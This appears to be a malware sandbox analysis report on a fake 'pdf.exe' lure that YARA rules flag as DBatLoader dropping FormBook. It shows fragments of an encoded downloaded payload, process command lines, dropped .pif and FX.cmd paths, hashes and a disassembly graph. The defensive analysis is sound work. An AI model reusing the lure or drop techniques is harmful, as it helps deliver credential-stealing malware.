                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 820528
                                                                Last-Modified: Wed, 18 Dec 2024 13:10:23 GMT
                                                                Date: Thu, 19 Dec 2024 06:58:00 GMT
                                                                Expires: Thu, 19 Dec 2024 06:58:00 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=ncw7Jg==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-12-19 06:58:01 UTC4939INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 65 47 52 41 54 44 68 59 61 48 69 45 6e 45 77 38 63 48 77 38 50 46 69 63 6e 4a 53 63 57 49 69 55 64 48 52 45 59 4a 52 6b 59 45 78 63 4f 45 52 34 66 4a 52 71 6d 72 71 56 5a 49 36 65 78 53 30 34 64 44 79 55 51 4a 52 73 6c 4a 42 49 64 70 71 36 6c 57 53 4f 6e 73 55 74 6d 63 33 52 35 64 6d 35 79 5a 6d 74 64 65 58 56 77 5a 58 56 31 62 6c 31 64 58 31 31 75 61 6c 39 6e 5a 33 74 73 58 33 4e 73 65 57 31 32 65 32 5a 6c 58 33 4a 6d 63 33 52 35 64 6d 35 79 5a 6d 74 64 65 58 56 77 5a 58 56 31 62 6c 31 64 58 31 31 75 61 6c 39 6e 5a 33 74 73 58 33 4e 73 65 57 31 32 65 32 5a 6c 58 33 4a 6d 63 33 52 35 64 6d 35 79 5a 6d 74 64 65 58 56 77 5a 58 56 31 62 6c 31 64 58 31 31 75 61 6c 39 6e 5a 33 74 73 58 33 4e 73 65 57 31 32 65 32 5a 6c 58 33 4a
                                                                Data Ascii: pq6lWSOnsUseGRATDhYaHiEnEw8cHw8PFicnJScWIiUdHREYJRkYExcOER4fJRqmrqVZI6exS04dDyUQJRslJBIdpq6lWSOnsUtmc3R5dm5yZmtdeXVwZXV1bl1dX11ual9nZ3tsX3NseW12e2ZlX3Jmc3R5dm5yZmtdeXVwZXV1bl1dX11ual9nZ3tsX3NseW12e2ZlX3Jmc3R5dm5yZmtdeXVwZXV1bl1dX11ual9nZ3tsX3NseW12e2ZlX3J
                                                                2024-12-19 06:58:01 UTC4817INData Raw: 4a 63 50 6a 6f 69 49 38 31 31 57 4b 67 35 44 36 4c 36 63 77 2f 34 5a 41 2b 54 62 4d 54 4f 50 4c 4a 4a 70 4f 43 32 69 4f 6a 48 62 41 48 67 50 4c 41 43 75 63 68 42 68 45 32 61 30 64 54 74 36 71 39 44 61 4b 59 61 53 79 57 2b 2f 45 55 34 68 41 4d 42 76 39 62 49 2f 38 6f 65 79 34 6d 33 79 67 46 4c 4e 4e 4e 68 46 5a 62 31 76 30 4a 42 37 51 33 69 30 55 78 44 68 44 42 47 7a 64 44 53 46 32 36 38 4e 7a 71 6d 72 42 30 6f 35 6b 45 78 71 55 52 68 4c 71 6c 45 56 39 7a 51 4e 48 61 57 34 54 59 73 74 4f 2f 30 41 6c 4f 33 53 76 35 4a 46 35 4a 45 75 39 66 45 72 4f 54 69 77 59 32 53 36 4d 72 54 6f 51 66 48 5a 6c 66 55 61 67 78 42 4e 32 42 52 69 43 4c 54 46 44 6e 2b 36 44 46 69 42 6d 35 76 61 61 6c 79 73 73 69 45 78 38 6e 63 78 48 53 35 6a 32 47 76 56 6a 78 51 67 30 57 6a 67
                                                                Data Ascii: JcPjoiI811WKg5D6L6cw/4ZA+TbMTOPLJJpOC2iOjHbAHgPLACuchBhE2a0dTt6q9DaKYaSyW+/EU4hAMBv9bI/8oey4m3ygFLNNNhFZb1v0JB7Q3i0UxDhDBGzdDSF268NzqmrB0o5kExqURhLqlEV9zQNHaW4TYstO/0AlO3Sv5JF5JEu9fErOTiwY2S6MrToQfHZlfUagxBN2BRiCLTFDn+6DFiBm5vaalyssiEx8ncxHS5j2GvVjxQg0Wjg
                                                                2024-12-19 06:58:01 UTC1326INData Raw: 37 4e 33 31 38 44 57 33 6c 48 6b 50 49 62 72 62 70 57 6b 57 78 38 59 37 56 33 49 37 6a 6e 2f 48 5a 65 4f 74 34 68 79 64 4a 52 72 39 37 56 77 45 54 78 34 31 44 62 4b 48 4f 77 66 35 78 7a 55 30 74 42 66 63 71 68 51 54 55 55 57 43 52 43 73 48 42 4f 39 74 65 2b 2f 32 74 35 43 38 2f 49 6b 58 35 5a 55 43 6c 67 61 45 43 6d 37 59 50 57 4a 4e 6b 77 69 4b 74 78 6e 42 62 7a 5a 4f 58 52 31 31 42 58 6b 38 62 57 34 2b 61 2b 55 55 4f 74 47 37 34 30 6d 4c 49 7a 4c 41 67 41 38 72 37 72 42 50 44 6c 52 31 76 36 34 4a 70 66 64 56 49 54 70 55 4e 35 4f 64 33 38 68 51 6d 48 6d 53 4e 35 64 42 50 4e 5a 71 30 66 6a 58 75 64 4b 52 4b 78 6a 49 57 75 6e 68 77 4c 44 70 31 51 5a 5a 49 6f 6f 75 32 59 5a 4b 51 32 50 54 57 31 69 39 4f 47 36 2f 4c 2f 43 41 64 64 4f 39 46 61 59 2f 30 4d 55
                                                                Data Ascii: 7N318DW3lHkPIbrbpWkWx8Y7V3I7jn/HZeOt4hydJRr97VwETx41DbKHOwf5xzU0tBfcqhQTUUWCRCsHBO9te+/2t5C8/IkX5ZUClgaECm7YPWJNkwiKtxnBbzZOXR11BXk8bW4+a+UUOtG740mLIzLAgA8r7rBPDlR1v64JpfdVITpUN5Od38hQmHmSN5dBPNZq0fjXudKRKxjIWunhwLDp1QZZIoou2YZKQ2PTW1i9OG6/L/CAddO9FaY/0MU
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 72 64 65 30 6e 5a 39 6e 58 73 6b 4d 6a 6f 69 78 74 70 35 4f 74 49 56 78 72 45 61 6f 58 74 6e 6f 38 55 34 48 61 62 32 4a 4b 38 34 54 45 48 62 67 37 69 47 6d 76 58 37 51 4d 4d 72 32 36 39 59 30 75 39 50 67 70 56 34 31 67 35 42 57 32 71 35 31 6b 61 58 66 76 47 4e 6e 69 4a 6d 38 2b 77 65 6a 2f 52 53 64 44 72 62 55 42 50 78 78 41 59 49 51 36 53 30 66 35 74 46 55 78 50 77 78 36 46 70 4c 75 74 75 48 39 35 4e 31 46 74 43 63 31 43 45 77 75 4e 48 4d 67 6d 71 7a 34 4c 68 50 71 4c 65 65 4c 4a 74 6d 52 49 57 39 46 71 44 47 58 78 50 4b 74 54 79 7a 6f 41 67 47 50 57 38 4f 61 2f 46 34 53 52 56 30 2f 54 6c 4b 53 79 71 70 78 77 47 35 66 55 50 6f 30 63 4a 68 35 72 54 36 6c 52 59 64 59 6b 37 6e 4c 38 6d 62 55 56 6d 37 6d 69 55 65 6f 79 34 73 6d 78 66 77 73 6b 54 37 41 66 55
                                                                Data Ascii: rde0nZ9nXskMjoixtp5OtIVxrEaoXtno8U4Hab2JK84TEHbg7iGmvX7QMMr269Y0u9PgpV41g5BW2q51kaXfvGNniJm8+wej/RSdDrbUBPxxAYIQ6S0f5tFUxPwx6FpLutuH95N1FtCc1CEwuNHMgmqz4LhPqLeeLJtmRIW9FqDGXxPKtTyzoAgGPW8Oa/F4SRV0/TlKSyqpxwG5fUPo0cJh5rT6lRYdYk7nL8mbUVm7miUeoy4smxfwskT7AfU
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 32 76 4b 6f 54 52 48 6f 57 61 47 42 31 45 64 64 64 4a 61 68 70 38 38 36 79 6f 64 55 4d 62 4d 50 72 36 4b 4d 72 30 2f 75 62 38 76 72 31 6b 66 51 52 47 65 6e 4c 57 65 44 6b 6f 6b 76 72 6b 73 2b 42 6f 32 66 67 67 47 6c 51 41 51 70 79 52 46 6d 41 71 75 65 72 6b 2f 65 47 41 37 49 6e 65 46 52 46 4a 33 54 66 65 73 65 7a 48 70 4e 6f 4e 4f 70 39 4c 6e 57 54 34 30 75 56 6a 30 66 6d 5a 46 72 32 58 58 6c 70 78 70 33 2b 39 4d 6c 69 32 66 6a 56 33 42 32 57 50 76 51 63 62 77 79 78 53 43 78 64 41 57 55 33 61 42 30 74 4f 74 35 41 38 41 6b 4f 74 70 58 6b 72 39 37 43 34 7a 47 66 70 4b 31 57 48 50 54 78 6f 39 78 72 44 59 66 34 69 77 30 5a 71 76 52 6f 7a 74 73 65 73 36 43 34 72 37 54 6f 76 43 6e 78 4d 77 62 73 6e 33 6a 4b 6b 45 35 63 4c 56 71 6e 41 72 61 36 55 2f 52 71 69 34
                                                                Data Ascii: 2vKoTRHoWaGB1EdddJahp886yodUMbMPr6KMr0/ub8vr1kfQRGenLWeDkokvrks+Bo2fggGlQAQpyRFmAquerk/eGA7IneFRFJ3TfesezHpNoNOp9LnWT40uVj0fmZFr2XXlpxp3+9Mli2fjV3B2WPvQcbwyxSCxdAWU3aB0tOt5A8AkOtpXkr97C4zGfpK1WHPTxo9xrDYf4iw0ZqvRoztses6C4r7TovCnxMwbsn3jKkE5cLVqnAra6U/Rqi4
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 72 44 4e 6a 76 42 65 69 70 53 65 6c 62 4e 73 35 63 4a 75 51 61 5a 4d 31 74 66 46 6c 46 32 7a 67 79 6c 4b 44 6d 66 35 75 52 6b 38 58 51 6b 6d 50 7a 75 6e 62 33 4a 74 51 68 71 57 34 35 4c 64 67 42 56 56 43 76 75 44 59 59 69 56 46 42 71 42 65 54 6c 56 63 2b 2b 33 38 4a 58 52 4e 43 5a 2b 6c 30 4a 31 48 77 79 53 47 62 43 41 62 31 7a 57 6d 48 54 57 51 63 56 79 78 43 64 48 54 75 72 44 45 71 77 69 69 38 70 75 31 54 57 59 7a 67 50 69 6b 76 4f 4f 34 45 44 32 76 78 62 76 6d 46 32 59 4a 37 56 4a 51 36 31 51 33 59 5a 53 55 31 32 6c 57 6d 35 5a 76 56 79 6d 7a 75 4a 63 4e 48 39 77 43 4c 6b 4e 36 78 64 4f 6f 57 57 58 56 68 6f 6d 36 4d 73 63 2b 7a 78 73 57 6a 51 36 79 5a 6e 34 35 36 46 4a 66 43 43 42 4a 69 2f 57 4e 47 4d 74 37 30 70 33 2b 47 62 66 38 36 49 53 6d 63 6c 43
                                                                Data Ascii: rDNjvBeipSelbNs5cJuQaZM1tfFlF2zgylKDmf5uRk8XQkmPzunb3JtQhqW45LdgBVVCvuDYYiVFBqBeTlVc++38JXRNCZ+l0J1HwySGbCAb1zWmHTWQcVyxCdHTurDEqwii8pu1TWYzgPikvOO4ED2vxbvmF2YJ7VJQ61Q3YZSU12lWm5ZvVymzuJcNH9wCLkN6xdOoWWXVhom6Msc+zxsWjQ6yZn456FJfCCBJi/WNGMt70p3+Gbf86ISmclC
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 6d 31 71 5a 30 42 4f 4c 41 50 63 6d 72 36 33 30 38 59 75 4f 71 46 66 46 73 6e 58 39 66 42 4e 46 52 6c 50 78 49 34 61 52 41 36 47 66 31 4f 70 74 43 61 65 6b 46 2b 4a 47 65 73 4a 34 38 4b 68 54 4a 74 36 58 39 50 47 49 31 5a 6d 66 2f 7a 62 63 30 42 4c 6d 5a 31 52 74 6f 31 65 48 35 53 34 54 77 4e 7a 50 4f 57 43 43 57 41 56 57 41 59 79 47 6b 38 65 2f 50 34 30 75 48 6e 76 76 43 72 56 53 78 55 6d 77 48 59 6e 7a 43 49 65 70 79 51 66 63 49 56 64 52 4d 6a 4c 72 77 71 6e 6b 6f 77 54 41 79 75 78 4d 33 49 6a 72 63 31 50 4e 6a 36 78 65 67 48 6f 39 47 4d 76 50 38 50 41 52 56 79 76 6f 31 77 67 44 35 57 53 51 37 35 54 63 35 67 74 71 41 52 35 64 56 46 41 78 6e 52 6f 68 65 4c 4b 4d 65 63 4e 75 67 4a 70 63 50 50 43 42 64 5a 71 6f 32 4c 58 55 46 33 62 62 4b 49 65 6b 45 51 64
                                                                Data Ascii: m1qZ0BOLAPcmr6308YuOqFfFsnX9fBNFRlPxI4aRA6Gf1OptCaekF+JGesJ48KhTJt6X9PGI1Zmf/zbc0BLmZ1Rto1eH5S4TwNzPOWCCWAVWAYyGk8e/P40uHnvvCrVSxUmwHYnzCIepyQfcIVdRMjLrwqnkowTAyuxM3Ijrc1PNj6xegHo9GMvP8PARVyvo1wgD5WSQ75Tc5gtqAR5dVFAxnRoheLKMecNugJpcPPCBdZqo2LXUF3bbKIekEQd
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 50 34 7a 4a 59 50 6b 5a 6a 43 76 38 50 30 58 72 54 77 73 41 57 55 6f 4d 78 74 34 51 35 48 55 69 42 67 6b 78 56 71 45 32 34 72 44 69 46 33 33 53 54 64 31 5a 69 66 48 6a 44 45 48 64 6e 78 74 35 74 64 49 49 59 4e 68 54 4d 50 52 74 51 6f 32 68 52 57 41 6f 6d 77 46 32 4b 76 38 37 4b 6c 64 68 62 79 6e 55 55 79 74 66 44 4e 49 32 6f 4b 5a 71 6a 55 57 35 4a 78 79 62 33 30 62 59 75 71 65 30 6d 38 4d 43 4b 47 48 46 6a 78 53 63 79 76 33 57 56 38 2b 42 6e 59 64 6f 66 71 74 4f 6b 53 51 32 70 64 77 6a 66 4d 34 4b 53 6b 6b 50 37 4e 74 43 44 78 4f 67 30 6f 54 32 59 73 73 42 75 41 35 34 63 54 44 6d 35 49 51 41 48 55 69 62 54 6f 70 57 65 36 75 4f 61 6c 65 71 6f 4b 6c 51 56 59 37 36 32 4c 56 6f 30 78 49 69 71 63 63 4c 64 6a 72 4d 57 4b 34 51 6a 47 39 64 51 56 2b 45 7a 56 47
                                                                Data Ascii: P4zJYPkZjCv8P0XrTwsAWUoMxt4Q5HUiBgkxVqE24rDiF33STd1ZifHjDEHdnxt5tdIIYNhTMPRtQo2hRWAomwF2Kv87KldhbynUUytfDNI2oKZqjUW5Jxyb30bYuqe0m8MCKGHFjxScyv3WV8+BnYdofqtOkSQ2pdwjfM4KSkkP7NtCDxOg0oT2YssBuA54cTDm5IQAHUibTopWe6uOaleqoKlQVY762LVo0xIiqccLdjrMWK4QjG9dQV+EzVG
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 76 43 54 38 36 46 65 46 52 61 31 6a 4e 32 2b 43 37 69 31 6b 32 4a 71 38 4a 77 2f 70 5a 77 4f 69 64 71 6e 54 76 42 61 47 6b 50 47 66 7a 5a 33 45 37 39 58 4e 7a 63 41 2f 38 35 35 75 6f 4a 46 2b 46 6a 6e 57 73 39 62 55 65 43 71 4f 4e 49 44 76 4f 41 57 2b 38 39 59 74 6b 39 72 65 65 36 77 30 56 73 2b 32 74 38 49 79 4b 74 35 47 4d 6d 6a 4c 51 57 30 71 6e 66 75 39 70 4e 38 79 71 78 73 63 69 41 49 62 6d 63 58 6f 49 33 67 4f 6e 59 49 53 70 4f 4e 6d 6a 2f 73 50 65 55 6a 32 47 6b 63 46 79 79 36 41 65 4b 72 65 6b 45 34 34 54 69 65 2b 4c 50 54 6c 31 37 55 6d 41 50 66 75 71 66 41 6f 55 32 61 65 6c 74 79 58 4a 36 7a 77 6a 65 54 46 44 68 52 76 6a 6a 4b 32 76 4e 2f 51 54 4a 64 4e 44 70 66 44 4d 43 77 7a 6e 44 4a 47 54 75 69 73 4b 45 45 6c 6f 48 56 4f 73 61 59 54 65 6f 48
                                                                Data Ascii: vCT86FeFRa1jN2+C7i1k2Jq8Jw/pZwOidqnTvBaGkPGfzZ3E79XNzcA/855uoJF+FjnWs9bUeCqONIDvOAW+89Ytk9ree6w0Vs+2t8IyKt5GMmjLQW0qnfu9pN8yqxsciAIbmcXoI3gOnYISpONmj/sPeUj2GkcFyy6AeKrekE44Tie+LPTl17UmAPfuqfAoU2aeltyXJ6zwjeTFDhRvjjK2vN/QTJdNDpfDMCwznDJGTuisKEEloHVOsaYTeoH
                                                                2024-12-19 06:58:01 UTC1390INData Raw: 33 4e 75 55 6e 32 68 6a 38 6c 50 67 32 69 77 2b 4a 4b 75 51 36 4f 5a 37 39 79 38 2b 77 48 34 75 71 47 47 64 69 6f 56 58 65 53 54 70 78 71 6e 45 71 4f 62 41 33 74 76 54 37 2b 53 7a 66 67 4c 6a 68 63 6d 77 79 6b 70 65 6c 51 70 53 43 5a 7a 59 71 58 76 6b 36 69 77 4e 47 71 69 77 4a 59 71 62 78 4b 39 63 37 55 5a 69 35 76 66 59 68 4d 55 62 4c 53 30 56 6e 54 4e 45 4f 61 53 78 69 65 4c 6f 65 50 79 55 36 6e 63 41 55 75 49 4e 70 6f 34 69 4f 6e 30 63 63 33 73 78 58 47 34 4b 2f 5a 4d 55 4d 57 6e 34 66 67 61 2b 33 38 59 79 4e 66 46 64 50 6e 73 59 57 6f 67 46 33 51 37 77 79 37 56 66 45 63 4e 73 4c 6f 6c 7a 57 36 31 75 50 4f 4e 46 38 74 48 4e 6f 6a 54 53 6c 4e 2f 4c 63 2b 4a 58 79 36 6c 38 73 74 4b 41 4c 71 71 57 65 64 4f 31 2f 61 7a 6d 70 75 36 65 75 66 6d 39 41 41 31
                                                                Data Ascii: 3NuUn2hj8lPg2iw+JKuQ6OZ79y8+wH4uqGGdioVXeSTpxqnEqObA3tvT7+SzfgLjhcmwykpelQpSCZzYqXvk6iwNGqiwJYqbxK9c7UZi5vfYhMUbLS0VnTNEOaSxieLoePyU6ncAUuINpo4iOn0cc3sxXG4K/ZMUMWn4fga+38YyNfFdPnsYWogF3Q7wy7VfEcNsLolzW61uPONF8tHNojTSlN/Lc+JXy6l8stKALqqWedO1/azmpu6eufm9AA1


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:01:57:51
                                                                Start date:19/12/2024
                                                                Path:C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe"
                                                                Imagebase:0x400000
                                                                File size:1'362'944 bytes
                                                                MD5 hash:72AB2A99902EC6F67B0D4DF67820328E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.2127061894.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2294905471.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.2253685238.0000000002406000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:01:58:02
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:01:58:02
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:01:58:02
                                                                Start date:19/12/2024
                                                                Path:C:\Users\Public\Libraries\xnxcxbpC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\xnxcxbpC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2690787267.00000000228E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2659308740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Antivirus matches:
                                                                • Detection: 3%, ReversingLabs
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:01:58:13
                                                                Start date:19/12/2024
                                                                Path:C:\Users\Public\Libraries\Cpbxcxnx.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Cpbxcxnx.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'362'944 bytes
                                                                MD5 hash:72AB2A99902EC6F67B0D4DF67820328E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 58%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:01:58:13
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:01:58:13
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:01:58:14
                                                                Start date:19/12/2024
                                                                Path:C:\Users\Public\Libraries\xnxcxbpC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\xnxcxbpC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2769119926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2792693070.000000001CB90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:01:58:21
                                                                Start date:19/12/2024
                                                                Path:C:\Users\Public\Libraries\Cpbxcxnx.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Cpbxcxnx.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'362'944 bytes
                                                                MD5 hash:72AB2A99902EC6F67B0D4DF67820328E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:01:58:24
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                Imagebase:0x1c0000
                                                                File size:236'544 bytes
                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:01:58:25
                                                                Start date:19/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff66e660000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:01:58:25
                                                                Start date:19/12/2024
                                                                Path:C:\Users\Public\Libraries\xnxcxbpC.pif
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\Public\Libraries\xnxcxbpC.pif
                                                                Imagebase:0x400000
                                                                File size:175'800 bytes
                                                                MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2833990663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2863377435.000000002C280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:15%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:10.1%
                                                                  Total number of Nodes:296
                                                                  Total number of Limit Nodes:16
                                                                  execution_graph 25391 2cd1c6c 25392 2cd1c7c 25391->25392 25393 2cd1d04 25391->25393 25396 2cd1c89 25392->25396 25397 2cd1cc0 25392->25397 25394 2cd1d0d 25393->25394 25395 2cd1f58 25393->25395 25398 2cd1d25 25394->25398 25399 2cd1e24 25394->25399 25402 2cd1fec 25395->25402 25403 2cd1fac 25395->25403 25404 2cd1f68 25395->25404 25401 2cd1c94 25396->25401 25439 2cd1724 25396->25439 25400 2cd1724 10 API calls 25397->25400 25405 2cd1d2c 25398->25405 25410 2cd1d48 25398->25410 25412 2cd1dfc 25398->25412 25414 2cd1e55 Sleep 25399->25414 25419 2cd1e7c 25399->25419 25421 2cd1e95 25399->25421 25406 2cd1cd7 25400->25406 25411 2cd1fb2 25403->25411 25413 2cd1724 10 API calls 25403->25413 25408 2cd1724 10 API calls 25404->25408 25424 2cd1a8c 8 API calls 25406->25424 25425 2cd1cfd 25406->25425 25426 2cd1f82 25408->25426 25409 2cd1724 10 API calls 25430 2cd1f2c 25409->25430 25415 2cd1d79 Sleep 25410->25415 25428 2cd1d9c 25410->25428 25417 2cd1724 10 API calls 25412->25417 25427 2cd1fc1 25413->25427 25418 2cd1e6f Sleep 25414->25418 25414->25419 25420 2cd1d91 Sleep 25415->25420 25415->25428 25416 2cd1ca1 25429 2cd1cb9 25416->25429 25463 2cd1a8c 25416->25463 25433 2cd1e05 25417->25433 25418->25399 25419->25409 25419->25421 25420->25410 25423 2cd1e1d 25424->25425 25431 2cd1a8c 8 API calls 25426->25431 25434 2cd1fa7 25426->25434 25427->25434 25435 2cd1a8c 8 API calls 25427->25435 25430->25421 25432 2cd1a8c 8 API calls 25430->25432 25431->25434 25436 2cd1f50 25432->25436 25433->25423 25437 2cd1a8c 8 API calls 25433->25437 25438 2cd1fe4 25435->25438 25437->25423 25440 2cd173c 25439->25440 25441 2cd1968 25439->25441 25451 2cd174e 25440->25451 25454 2cd17cb Sleep 25440->25454 25442 2cd1a80 25441->25442 25443 2cd1938 25441->25443 25445 2cd1a89 25442->25445 25446 2cd1684 VirtualAlloc 25442->25446 25447 2cd1947 Sleep 25443->25447 25457 2cd1986 25443->25457 25444 2cd175d 25444->25416 25445->25416 25448 2cd16bf 25446->25448 25449 2cd16af 25446->25449 25452 2cd195d Sleep 25447->25452 25447->25457 25448->25416 25480 2cd1644 25449->25480 25450 2cd182c 25462 2cd1838 25450->25462 25486 2cd15cc 25450->25486 25451->25444 25451->25450 25455 2cd180a Sleep 